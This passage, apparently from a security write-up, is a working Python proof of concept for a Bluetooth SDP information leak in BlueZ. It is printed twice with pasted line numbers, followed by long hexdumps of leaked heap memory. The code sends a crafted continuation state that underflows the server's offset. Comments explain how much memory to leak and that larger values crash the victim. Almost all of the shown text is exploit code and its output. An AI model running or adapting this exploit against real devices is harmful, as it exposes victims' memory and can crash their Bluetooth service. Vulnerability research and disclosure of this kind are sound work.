attribute request is correct') exit(2) # now we craft our malicious cstate cstate = p32(timestamp, endian='little') # just send back the same timestamp cstate += p16(offset+100, endian='little') # increase the offset by 100 to cause underflow cstate += p16(0x0000, endian='little') # 0x0000 to indicate end of cstate log.info('Triggering infoleak...') # now we send the second packet that triggers the information leak # the manipulated CSTATE will cause an underflow that will make the server # send us LEAK_BYTES bytes instead of the correct amount. sdp = sdppacket(SERVICE_REC_HANDLE, LEAK_BYTES, attr*10, cstate) sock.send(sdp) # receive leaked data data = sock.recv(mtu) log.info("The response is %d bytes large" % len(data)) print hexdump(data) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 from pwn import * import bluetooth if not 'TARGET' in args: log.info("Usage: sdp_infoleak_poc.py TARGET=XX:XX:XX:XX:XX:XX") exit() # the configuration here depends on the victim device. # Discovery could be automated but for a simple PoC it would be a bit overkill # the attacker can simply gather the required information by running # sdptool browse --xml XX:XX:XX:XX:XX:XX # on his machine (replace XX:XX:XX:XX:XX:XX with victim MAC) # I have chosen to request attributes from the Generic Access Profile # but it does not really matter as long as we can generate a response with a # size large enough to create a continuation state # on my machine, sdptool prints the following: # <attribute id="0x0000"> # <uint32 value="0x00010001" /> # </attribute> # [...] # <attribute id="0x0102"> # <text value="BlueZ" /> # </attribute> # please replace these values if they should not match your victim device # the service from which we want to request attributes (GAP) SERVICE_REC_HANDLE = 0x00010001 # the attribute we want to request (in this case, the String "BlueZ") SERVICE_ATTR_ID = 0x0102 target = args['TARGET'] # TARGET Mac address mtu = 65535 # MTU to use context.endian = 'big' # this is how many bytes we want to leak # you can set it up to 0x7FFF # if you set it to 0x8000 or higher, the victim will crash # I have experienced that with slow Bluetooth hardware, large leaks can # sometimes result in timeouts so I don't recommend to set it larger than # 0x0FFF for this PoC LEAK_BYTES = 0x0FFF # this function crafts a SDP attribute request packet # handle: the service we want to query # max_rsp_size: how many bytes we are willing to accept in a single response packet # attr: the attribute(s) we want to query # cstate: the cstate to send def sdppacket(handle, max_rsp_size, attr, cstate): # craft packet to reach vulnerable code pkt = "" pkt += p32(handle) # handle pkt += p16(max_rsp_size)# max_rsp_size # contains an attribute sequence with the length describing the attributes being 16 bit long # see extract_des function in line 113 of src/sdpd-request.c pkt += p8(0x36) # DTD (seq_type SDP_SEQ16) pkt += p16(len(attr)) # seq size, 16 bit according to DTD # attributes pkt += attr # append cstate if cstate: pkt += p8(len(cstate)) pkt += cstate else: pkt += p8(0x00) # no cstate pduhdr = "" pduhdr += p8(0x04) # pdu_id 0x04 -> SVC_ATTR_REQ (we want to send an attribute request) pduhdr += p16(0x0000) # TID, doesn't matter pduhdr += p16(len(pkt)) # plen, length of body return pduhdr + pkt if __name__ == '__main__': log.info('Creating L2CAP socket') sock = bluetooth.BluetoothSocket(bluetooth.L2CAP) bluetooth.set_l2cap_mtu(sock, mtu) log.info('Connecting to target') sock.connect((target, 0x0001)) # connect to target on PSM 0x0001 (SDP) log.info('Sending packet to prepare serverside cstate') # the attribute we want to read attr = p8(0x09) # length of ATTR_ID (SDP_UINT16 - see lib/sdp.h) attr += p16(SERVICE_ATTR_ID) # craft the packet sdp = sdppacket( SERVICE_REC_HANDLE, # the service handle 101, # max size of the response we are willing to accept attr*10, # just request the same attribute 10 times, response will be 102 bytes large None) # no cstate for now sock.send(sdp) # receive response to first packet data = sock.recv(mtu) # parse the cstate we received from the server cstate_len_index = len(data)-9 cstate_len = u8(data[cstate_len_index], endian='little') # sanity check: cstate length should always be 8 byte if cstate_len != 8: log.error('We did not receive a cstate with the length we expected, check if the attribute ids are correct') exit(1) # the cstate contains a timestamp which is used as a "key" on the server to find the # cstate data again. We will just send the same value back timestamp = u32(data[cstate_len_index+1:cstate_len_index+5], endian='little') # offset will be the value of cstate->cStateValue.maxBytesSent when we send it back offset = u16(data[cstate_len_index+5:cstate_len_index+7], endian='little') log.info("cstate: len=%d timestamp=%x offset=%d" % (cstate_len, timestamp, offset)) if offset != 101: log.error('we expected to receive an offset of size 101, check if the attribute request is correct') exit(2) # now we craft our malicious cstate cstate = p32(timestamp, endian='little') # just send back the same timestamp cstate += p16(offset+100, endian='little') # increase the offset by 100 to cause underflow cstate += p16(0x0000, endian='little') # 0x0000 to indicate end of cstate log.info('Triggering infoleak...') # now we send the second packet that triggers the information leak # the manipulated CSTATE will cause an underflow that will make the server # send us LEAK_BYTES bytes instead of the correct amount. sdp = sdppacket(SERVICE_REC_HANDLE, LEAK_BYTES, attr*10, cstate) sock.send(sdp) # receive leaked data data = sock.recv(mtu) log.info("The response is %d bytes large" % len(data)) print hexdump(data) If everything happens as expected, we shall get a similar output to this: [*] Creating L2CAP socket [*] Connecting to target [*] Sending packet to prepare serverside cstate [*] cstate: len=8 timestamp=5aa54c56 offset=101 [*] Triggering infoleak... [*] The response is 4111 bytes large 00000000 05 00 00 10 0a 0f ff 68 6e 6f 6c 6f 67 69 65 73 │····│···h│nolo│gies│ 00000010 3d 42 52 2f 45 44 52 3b 0a 54 72 75 73 74 65 64 │=BR/│EDR;│·Tru│sted│ 00000020 3d 66 61 6c 73 65 0a 42 6c 6f 63 6b 65 64 3d 66 │=fal│se·B│lock│ed=f│ 00000030 61 6c 73 65 0a 53 65 72 76 69 63 65 73 3d 30 30 │alse│·Ser│vice│s=00│ 00000040 30 30 31 31 30 35 2d 30 30 30 30 2d 31 30 30 30 │0011│05-0│000-│1000│ 00000050 2d 38 30 30 30 2d 30 30 38 30 35 66 39 62 33 34 │-800│0-00│805f│9b34│ 00000060 66 62 3b 30 30 30 30 31 31 30 36 2d 30 30 30 30 │fb;0│0001│106-│0000│ 00000070 2d 31 30 30 30 2d 38 30 30 30 2d 30 30 38 30 35 │-100│0-80│00-0│0805│ 00000080 66 39 62 33 34 66 62 3b 30 30 30 30 31 31 30 61 │f9b3│4fb;│0000│110a│ 00000090 2d 30 30 30 30 2d 31 30 30 30 2d 38 30 30 30 2d │-000│0-10│00-8│000-│ 000000a0 30 30 38 30 35 66 39 62 33 34 66 62 3b 30 30 30 │0080│5f9b│34fb│;000│ 000000b0 30 31 31 30 63 2d 30 30 30 30 2d 31 30 30 30 2d │0110│c-00│00-1│000-│ 000000c0 38 30 30 30 2d 30 30 38 30 35 66 39 62 33 34 66 │8000│-008│05f9│b34f│ 000000d0 62 3b 30 30 30 30 31 31 30 65 2d 30 30 30 30 2d │b;00│0011│0e-0│000-│ 000000e0 31 30 30 30 2d 38 30 30 30 2d 30 30 38 30 35 66 │1000│-800│0-00│805f│ 000000f0 39 62 33 34 66 62 3b 30 30 30 30 31 31 31 32 2d │9b34│fb;0│0001│112-│ 00000100 30 30 30 30 2d 31 30 30 30 2d 38 30 30 30 2d 30 │0000│-100│0-80│00-0│ 00000110 30 38 30 35 66 39 62 33 34 66 62 3b 30 30 30 30 │0805│f9b3│4fb;│0000│ 00000120 31 31 31 35 2d 30 30 30 30 2d 31 30 30 30 2d 38 │1115│-000│0-10│00-8│ 00000130 30 30 30 2d 30 30 38 30 35 66 39 62 33 34 66 62 │000-│0080│5f9b│34fb│ 00000140 3b 30 30 30 30 31 31 31 36 2d 30 30 30 30 2d 31 │;000│0111│6-00│00-1│ 00000150 30 30 30 2d 38 30 30 30 2d 30 30 38 30 35 66 39 │000-│8000│-008│05f9│ 00000160 62 33 34 66 62 3b 30 30 30 30 31 31 31 66 2d 30 │b34f│b;00│0011│1f-0│ 00000170 30 30 30 2d 31 30 30 30 2d 38 30 30 30 2d 30 30 │000-│1000│-800│0-00│ 00000180 38 30 35 66 39 62 33 34 66 62 3b 30 30 30 30 31 │805f│9b34│fb;0│0001│ 00000190 31 32 66 2d 30 30 30 30 2d 31 30 30 30 2d 38 30 │12f-│0000│-100│0-80│ 000001a0 30 30 2d 30 30 38 30 35 66 39 62 33 34 66 62 3b │00-0│0805│f9b3│4fb;│ 000001b0 30 30 30 30 31 31 33 32 2d 30 30 30 30 2d 31 30 │0000│1132│-000│0-10│ 000001c0 30 30 2d 38 30 30 30 2d 30 30 38 30 35 66 39 62 │00-8│000-│0080│5f9b│ 000001d0 33 34 66 62 3b 30 30 30 30 31 32 30 30 2d 30 30 │34fb│;000│0120│0-00│ 000001e0 30 30 2d 31 30 30 30 2d 38 30 30 30 2d 30 30 38 │00-1│000-│8000│-008│ 000001f0 30 35 66 39 62 33 34 66 62 3b 30 30 30 30 31 38 │05f9│b34f│b;00│0018│ 00000200 30 30 2d 30 30 30 30 2d 31 30 30 30 2d 38 30 30 │00-0│000-│1000│-800│ 00000210 30 2d 30 30 38 30 35 66 39 62 33 34 66 62 3b 30 │0-00│805f│9b34│fb;0│ 00000220 30 30 30 31 38 30 31 2d 30 30 30 30 2d 31 30 30 │0001│801-│0000│-100│ 00000230 30 2d 38 30 30 30 2d 30 30 38 30 35 66 39 62 33 │0-80│00-0│0805│f9b3│ 00000240 34 66 62 3b 30 30 30 30 36 36 37 35 2d 37 34 37 │4fb;│0000│6675│-747│ 00000250 35 2d 37 32 36 35 2d 36 34 36 39 2d 36 31 36 63 │5-72│65-6│469-│616c│ 00000260 36 32 37 35 36 64 37 30 3b 0a 0a 5b 44 65 76 69 │6275│6d70│;··[│Devi│ 00000270 63 65 49 44 5d 0a 53 6f 75 72 63 65 3d 31 0a 56 │ceID│]·So│urce│=1·V│ 00000280 65 6e 64 6f 72 3d 31 35 0a 50 72 6f 64 75 63 74 │endo│r=15│·Pro│duct│ 00000290 3d 34 36 30 38 0a 56 65 72 73 69 6f 6e 3d 35 31 │=460│8·Ve│rsio│n=51│ 000002a0 37 34 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 │74··│····│····│····│ 000002b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 000003d0 00 00 00 00 00 00 41 00 00 00 00 00 00 00 35 00 │····│··A·│····│··5·│ 000003e0 04 00 00 00 00 00 80 4d 40 27 aa 55 00 00 00 00 │····│···M│@'·U│····│ 000003f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000400 00 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000410 00 00 00 00 00 00 41 00 00 00 00 00 00 00 09 00 │····│··A·│····│····│ 00000420 11 03 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000440 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000450 00 00 00 00 00 00 31 00 00 00 00 00 00 00 01 00 │····│··1·│····│····│ 00000460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 │····│····│····│··0·│ 00000480 00 00 00 00 00 00 31 00 00 00 00 00 00 00 f0 b5 │····│··1·│····│····│ 00000490 41 27 aa 55 00 00 8c 45 a5 5a 00 00 00 00 30 b9 │A'·U│···E│·Z··│··0·│ 000004a0 41 27 aa 55 00 00 66 00 00 00 66 00 00 00 33 34 │A'·U│··f·│··f·│··34│ 000004b0 66 62 00 00 00 00 11 04 00 00 00 00 00 00 20 17 │fb··│····│····│·· ·│ 000004c0 41 27 aa 55 00 00 45 20 6e 6f 64 65 20 50 55 42 │A'·U│··E │node│ PUB│ 000004d0 4c 49 43 20 22 2d 2f 2f 66 72 65 65 64 65 73 6b │LIC │"-//│free│desk│ 000004e0 74 6f 70 2f 2f 44 54 44 20 44 2d 42 55 53 20 4f │top/│/DTD│ D-B│US O│ 000004f0 62 6a 65 63 74 20 49 6e 74 72 6f 73 70 65 63 74 │bjec│t In│tros│pect│ 00000500 69 6f 6e 20 31 2e 30 2f 2f 45 4e 22 0a 22 68 74 │ion │1.0/│/EN"│·"ht│ 00000510 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 64 65 73 │tp:/│/www│.fre│edes│ 00000520 6b 74 6f 70 2e 6f 72 67 2f 73 74 61 6e 64 61 72 │ktop│.org│/sta│ndar│ 00000530 64 73 2f 64 62 75 73 2f 31 2e 30 2f 69 6e 74 72 │ds/d│bus/│1.0/│intr│ 00000540 6f 73 70 65 63 74 2e 64 74 64 22 3e 0a 3c 6e 6f │ospe│ct.d│td">│·<no│ 00000550 64 65 3e 3c 69 6e 74 65 72 66 61 63 65 20 6e 61 │de><│inte│rfac│e na│ 00000560 6d 65 3d 22 6f 72 67 2e 66 72 65 65 64 65 73 6b │me="│org.│free│desk│ 00000570 74 6f 70 2e 44 42 75 73 2e 49 6e 74 72 6f 73 70 │top.│DBus│.Int│rosp│ 00000580 65 63 74 61 62 6c 65 22 3e 3c 6d 65 74 68 6f 64 │ecta│ble"│><me│thod│ 00000590 20 6e 61 6d 65 3d 22 49 6e 74 72 6f 73 70 65 63 │ nam│e="I│ntro│spec│ 000005a0 74 22 3e 3c 61 72 67 20 6e 61 6d 65 3d 22 78 6d │t"><│arg │name│="xm│ 000005b0 6c 22 20 74 79 70 65 3d 22 73 22 20 64 69 72 65 │l" t│ype=│"s" │dire│ 000005c0 63 74 69 6f 6e 3d 22 6f 75 74 22 2f 3e 0a 3c 2f │ctio│n="o│ut"/│>·</│ 000005d0 6d 65 74 68 6f 64 3e 3c 2f 69 6e 74 65 72 66 61 │meth│od><│/int│erfa│ 000005e0 63 65 3e 3c 69 6e 74 65 72 66 61 63 65 20 6e 61 │ce><│inte│rfac│e na│ 000005f0 6d 65 3d 22 6f 72 67 2e 66 72 65 65 64 65 73 6b │me="│org.│free│desk│ 00000600 74 6f 70 2e 44 42 75 73 2e 4f 62 6a 65 63 74 4d │top.│DBus│.Obj│ectM│ 00000610 61 6e 61 67 65 72 22 3e 3c 6d 65 74 68 6f 64 20 │anag│er">│<met│hod │ 00000620 6e 61 6d 65 3d 22 47 65 74 4d 61 6e 61 67 65 64 │name│="Ge│tMan│aged│ 00000630 4f 62 6a 65 63 74 73 22 3e 3c 61 72 67 20 6e 61 │Obje│cts"│><ar│g na│ 00000640 6d 65 3d 22 6f 62 6a 65 63 74 73 22 20 74 79 70 │me="│obje│cts"│ typ│ 00000650 65 3d 22 61 7b 6f 61 7b 73 61 7b 73 76 7d 7d 7d │e="a│{oa{│sa{s│v}}}│ 00000660 22 20 64 69 72 65 63 74 69 6f 6e 3d 22 6f 75 74 │" di│rect│ion=│"out│ 00000670 22 2f 3e 0a 3c 2f 6d 65 74 68 6f 64 3e 3c 73 69 │"/>·│</me│thod│><si│ 00000680 67 6e 61 6c 20 6e 61 6d 65 3d 22 49 6e 74 65 72 │gnal│ nam│e="I│nter│ 00000690 66 61 63 65 73 41 64 64 65 64 22 3e 3c 61 72 67 │face│sAdd│ed">│<arg│ 000006a0 20 6e 61 6d 65 3d 22 6f 62 6a 65 63 74 22 20 74 │ nam│e="o│bjec│t" t│ 000006b0 79 70 65 3d 22 6f 22 2f 3e 0a 3c 61 72 67 20 6e │ype=│"o"/│>·<a│rg n│ 000006c0 61 6d 65 3d 22 69 6e 74 65 72 66 61 63 65 73 22 │ame=│"int│erfa│ces"│ 000006d0 20 74 79 70 65 3d 22 61 7b 73 61 7b 73 76 7d 7d │ typ│e="a│{sa{│sv}}│ 000006e0 22 2f 3e 0a 3c 2f 73 69 67 6e 61 6c 3e 0a 3c 73 │"/>·│</si│gnal│>·<s│ 000006f0 69 67 6e 61 6c 20 6e 61 6d 65 3d 22 49 6e 74 65 │igna│l na│me="│Inte│ 00000700 72 66 61 63 65 73 52 65 6d 6f 76 65 64 22 3e 3c │rfac│esRe│move│d"><│ 00000710 61 72 67 20 6e 61 6d 65 3d 22 6f 62 6a 65 63 74 │arg │name│="ob│ject│ 00000720 22 20 74 79 70 65 3d 22 6f 22 2f 3e 0a 3c 61 72 │" ty│pe="│o"/>│·<ar│ 00000730 67 20 6e 61 6d 65 3d 22 69 6e 74 65 72 66 61 63 │g na│me="│inte│rfac│ 00000740 65 73 22 20 74 79 70 65 3d 22 61 73 22 2f 3e 0a │es" │type│="as│"/>·│ 00000750 3c 2f 73 69 67 6e 61 6c 3e 0a 3c 2f 69 6e 74 65 │</si│gnal│>·</│inte│ 00000760 72 66 61 63 65 3e 3c 6e 6f 64 65 20 6e 61 6d 65 │rfac│e><n│ode │name│ 00000770 3d 22 6f 72 67 22 2f 3e 3c 2f 6e 6f 64 65 3e 00 │="or│g"/>│</no│de>·│ 00000780 30 30 2d 30 30 30 30 2d 31 30 30 30 2d 38 30 30 │00-0│000-│1000│-800│ 00000790 30 2d 30 30 38 30 35 66 39 62 33 34 66 62 00 00 │0-00│805f│9b34│fb··│ 000007a0 00 00 24 00 00 00 30 30 30 30 31 38 30 30 2d 30 │··$·│··00│0018│00-0│ 000007b0 30 30 30 2d 31 30 30 30 2d 38 30 30 30 2d 30 30 │000-│1000│-800│0-00│ 000007c0 38 30 35 66 39 62 33 34 66 62 00 00 00 00 24 00 │805f│9b34│fb··│··$·│ 000007d0 00 00 30 30 30 30 31 38 30 31 2d 30 30 30 30 2d │··00│0018│01-0│000-│ 000007e0 31 30 30 30 2d 38 30 30 30 2d 30 30 38 30 35 66 │1000│-800│0-00│805f│ 000007f0 39 62 33 34 66 62 00 00 00 00 24 00 00 00 30 30 │9b34│fb··│··$·│··00│ 00000800 30 30 36 36 37 35 2d 37 34 37 35 2d 37 32 36 35 │0066│75-7│475-│7265│ 00000810 2d 36 34 36 39 2d 36 31 36 63 36 32 37 35 36 64 │-646│9-61│6c62│756d│ 00000820 37 30 00 00 00 00 08 00 00 00 4d 6f 64 61 6c 69 │70··│····│··Mo│dali│ 00000830 61 73 00 01 73 00 19 00 00 00 62 6c 75 65 74 6f │as··│s···│··bl│ueto│ 00000840 6f 74 68 3a 76 30 30 30 46 70 31 32 30 30 64 31 │oth:│v000│Fp12│00d1│ 00000850 34 33 36 00 00 00 07 00 00 00 41 64 61 70 74 65 │436·│····│··Ad│apte│ 00000860 72 00 01 6f 00 00 0f 00 00 00 2f 6f 72 67 2f 62 │r··o│····│··/o│rg/b│ 00000870 6c 75 65 7a 2f 68 63 69 30 00 00 00 00 00 10 00 │luez│/hci│0···│····│ 00000880 00 00 53 65 72 76 69 63 65 73 52 65 73 6f 6c 76 │··Se│rvic│esRe│solv│ 00000890 65 64 00 01 62 00 00 00 00 00 00 00 00 00 1f 00 │ed··│b···│····│····│ 000008a0 00 00 6f 72 67 2e 66 72 65 65 64 65 73 6b 74 6f │··or│g.fr│eede│skto│ 000008b0 70 2e 44 42 75 73 2e 50 72 6f 70 65 72 74 69 65 │p.DB│us.P│rope│rtie│ 000008c0 73 00 00 00 00 00 11 02 00 00 00 00 00 00 a0 29 │s···│····│····│···)│ 000008d0 41 27 aa 55 00 00 74 77 6f 72 6b 31 00 00 18 00 │A'·U│··tw│ork1│····│ 000008e0 00 00 00 00 00 00 09 00 00 00 43 6f 6e 6e 65 63 │····│····│··Co│nnec│ 000008f0 74 65 64 00 01 62 00 00 00 00 00 00 00 00 17 00 │ted·│·b··│····│····│ 00000900 00 00 6f 72 67 2e 62 6c 75 65 7a 2e 4d 65 64 69 │··or│g.bl│uez.│Medi│ 00000910 61 43 6f 6e 74 72 6f 6c 31 00 18 00 00 00 09 00 │aCon│trol│1···│····│ 00000920 00 00 43 6f 6e 6e 65 63 74 65 64 00 01 62 00 00 │··Co│nnec│ted·│·b··│ 00000930 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000ac0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 │····│····│····│····│ 00000ad0 00 00 00 00 00 00 11 02 00 00 00 00 00 00 b0 2b │····│····│····│···+│ 00000ae0 41 27 aa 55 00 00 00 00 00 00 00 00 00 00 01 00 │A'·U│····│····│····│ 00000af0 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000b00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000b10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000b20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 │····│····│····│····│ 00000b30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000b60 00 00 00 00 00 00 11 00 00 00 00 00 00 00 12 00 │····│····│····│····│ 00000b70 00 00 00 00 00 00 13 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000b80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000bb0 00 00 00 00 00 00 1b 00 00 00 00 00 00 00 1c 00 │····│····│····│····│ 00000bc0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000bd0 00 00 00 00 00 00 1f 00 00 00 00 00 00 00 20 00 │····│····│····│·· ·│ 00000be0 00 00 00 00 00 00 21 00 00 00 00 00 00 00 00 00 │····│··!·│····│····│ 00000bf0 00 00 00 00 00 00 23 00 00 00 00 00 00 00 24 00 │····│··#·│····│··$·│ 00000c00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000c80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 00 │····│····│····│··6·│ 00000c90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000ce0 00 00 00 00 00 00 11 02 00 00 00 00 00 00 20 ca │····│····│····│·· ·│ 00000cf0 40 27 aa 55 00 00 00 00 00 00 00 00 00 00 60 d5 │@'·U│····│····│··`·│ 00000d00 3f 27 aa 55 00 00 80 3f 40 27 aa 55 00 00 00 00 │?'·U│···?│@'·U│····│ 00000d10 00 00 00 00 00 00 e0 48 40 27 aa 55 00 00 00 00 │····│···H│@'·U│····│ 00000d20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000d30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 54 │····│····│····│···T│ 00000d40 40 27 aa 55 00 00 00 00 00 00 00 00 00 00 00 00 │@'·U│····│····│····│ 00000d50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000d70 00 00 00 00 00 00 d0 82 40 27 aa 55 00 00 80 8b │····│····│@'·U│····│ 00000d80 40 27 aa 55 00 00 a0 8c 40 27 aa 55 00 00 00 00 │@'·U│····│@'·U│····│ 00000d90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000dc0 00 00 00 00 00 00 70 a8 40 27 aa 55 00 00 50 a9 │····│··p·│@'·U│··P·│ 00000dd0 40 27 aa 55 00 00 00 00 00 00 00 00 00 00 00 00 │@'·U│····│····│····│ 00000de0 00 00 00 00 00 00 10 c6 40 27 aa 55 00 00 c0 c6 │····│····│@'·U│····│ 00000df0 40 27 aa 55 00 00 20 c8 40 27 aa 55 00 00 00 00 │@'·U│·· ·│@'·U│····│ 00000e00 00 00 00 00 00 00 60 d3 40 27 aa 55 00 00 d0 d4 │····│··`·│@'·U│····│ 00000e10 40 27 aa 55 00 00 00 00 00 00 00 00 00 00 00 00 │@'·U│····│····│····│ 00000e20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000e90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 a2 │····│····│····│····│ 00000ea0 41 27 aa 55 00 00 00 00 00 00 00 00 00 00 00 00 │A'·U│····│····│····│ 00000eb0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000ef0 00 00 00 00 00 00 51 00 00 00 00 00 00 00 80 e5 │····│··Q·│····│····│ 00000f00 3f 27 aa 55 00 00 2f 62 6c 75 65 74 6f 6f 74 68 │?'·U│··/b│luet│ooth│ 00000f10 2f 37 30 3a 46 33 3a 39 35 3a 37 41 3a 42 39 3a │/70:│F3:9│5:7A│:B9:│ 00000f20 43 38 2f 63 61 63 68 65 2f 30 30 3a 31 41 3a 37 │C8/c│ache│/00:│1A:7│ 00000f30 44 3a 44 41 3a 37 31 3a 31 31 2e 57 46 53 49 46 │D:DA│:71:│11.W│FSIF│ 00000f40 5a 00 00 00 00 00 21 00 00 00 00 00 00 00 01 00 │Z···│··!·│····│····│ 00000f50 00 00 17 00 00 00 18 00 00 00 19 00 00 00 30 75 │····│····│····│··0u│ 00000f60 00 00 00 00 00 00 51 00 00 00 00 00 00 00 40 e1 │····│··Q·│····│··@·│ 00000f70 41 27 aa 55 00 00 70 81 40 27 aa 55 00 00 20 00 │A'·U│··p·│@'·U│·· ·│ 00000f80 00 00 00 00 00 00 30 00 00 00 00 00 00 00 70 81 │····│··0·│····│··p·│ 00000f90 40 27 aa 55 00 00 73 76 7d 61 73 00 00 00 20 00 │@'·U│··sv│}as·│·· ·│ 00000fa0 00 00 00 00 00 00 f0 c4 40 27 aa 55 00 00 50 00 │····│····│@'·U│··P·│ 00000fb0 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000fc0 00 00 00 00 00 00 00 12 41 27 aa 55 00 00 18 00 │····│····│A'·U│····│ 00000fd0 00 00 20 00 00 00 00 00 00 00 00 00 00 00 ff ff │·· ·│····│····│····│ 00000fe0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff │····│····│····│····│ * 00001000 ff ff ff ff ff ff 08 56 4c a5 5a c8 10 00 00 │····│···V│L·Z·│···│ 0000100f 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 [*] Creating L2CAP socket [*] Connecting to target [*] Sending packet to prepare serverside cstate [*] cstate: len=8 timestamp=5aa54c56 offset=101 [*] Triggering infoleak... [*] The response is 4111 bytes large 00000000 05 00 00 10 0a 0f ff 68 6e 6f 6c 6f 67 69 65 73 │····│···h│nolo│gies│ 00000010 3d 42 52 2f 45 44 52 3b 0a 54 72 75 73 74 65 64 │=BR/│EDR;│·Tru│sted│ 00000020 3d 66 61 6c 73 65 0a 42 6c 6f 63 6b 65 64 3d 66 │=fal│se·B│lock│ed=f│ 00000030 61 6c 73 65 0a 53 65 72 76 69 63 65 73 3d 30 30 │alse│·Ser│vice│s=00│ 00000040 30 30 31 31 30 35 2d 30 30 30 30 2d 31 30 30 30 │0011│05-0│000-│1000│ 00000050 2d 38 30 30 30 2d 30 30 38 30 35 66 39 62 33 34 │-800│0-00│805f│9b34│ 00000060 66 62 3b 30 30 30 30 31 31 30 36 2d 30 30 30 30 │fb;0│0001│106-│0000│ 00000070 2d 31 30 30 30 2d 38 30 30 30 2d 30 30 38 30 35 │-100│0-80│00-0│0805│ 00000080 66 39 62 33 34 66 62 3b 30 30 30 30 31 31 30 61 │f9b3│4fb;│0000│110a│ 00000090 2d 30 30 30 30 2d 31 30 30 30 2d 38 30 30 30 2d │-000│0-10│00-8│000-│ 000000a0 30 30 38 30 35 66 39 62 33 34 66 62 3b 30 30 30 │0080│5f9b│34fb│;000│ 000000b0 30 31 31 30 63 2d 30 30 30 30 2d 31 30 30 30 2d │0110│c-00│00-1│000-│ 000000c0 38 30 30 30 2d 30 30 38 30 35 66 39 62 33 34 66 │8000│-008│05f9│b34f│ 000000d0 62 3b 30 30 30 30 31 31 30 65 2d 30 30 30 30 2d │b;00│0011│0e-0│000-│ 000000e0 31 30 30 30 2d 38 30 30 30 2d 30 30 38 30 35 66 │1000│-800│0-00│805f│ 000000f0 39 62 33 34 66 62 3b 30 30 30 30 31 31 31 32 2d │9b34│fb;0│0001│112-│ 00000100 30 30 30 30 2d 31 30 30 30 2d 38 30 30 30 2d 30 │0000│-100│0-80│00-0│ 00000110 30 38 30 35 66 39 62 33 34 66 62 3b 30 30 30 30 │0805│f9b3│4fb;│0000│ 00000120 31 31 31 35 2d 30 30 30 30 2d 31 30 30 30 2d 38 │1115│-000│0-10│00-8│ 00000130 30 30 30 2d 30 30 38 30 35 66 39 62 33 34 66 62 │000-│0080│5f9b│34fb│ 00000140 3b 30 30 30 30 31 31 31 36 2d 30 30 30 30 2d 31 │;000│0111│6-00│00-1│ 00000150 30 30 30 2d 38 30 30 30 2d 30 30 38 30 35 66 39 │000-│8000│-008│05f9│ 00000160 62 33 34 66 62 3b 30 30 30 30 31 31 31 66 2d 30 │b34f│b;00│0011│1f-0│ 00000170 30 30 30 2d 31 30 30 30 2d 38 30 30 30 2d 30 30 │000-│1000│-800│0-00│ 00000180 38 30 35 66 39 62 33 34 66 62 3b 30 30 30 30 31 │805f│9b34│fb;0│0001│ 00000190 31 32 66 2d 30 30 30 30 2d 31 30 30 30 2d 38 30 │12f-│0000│-100│0-80│ 000001a0 30 30 2d 30 30 38 30 35 66 39 62 33 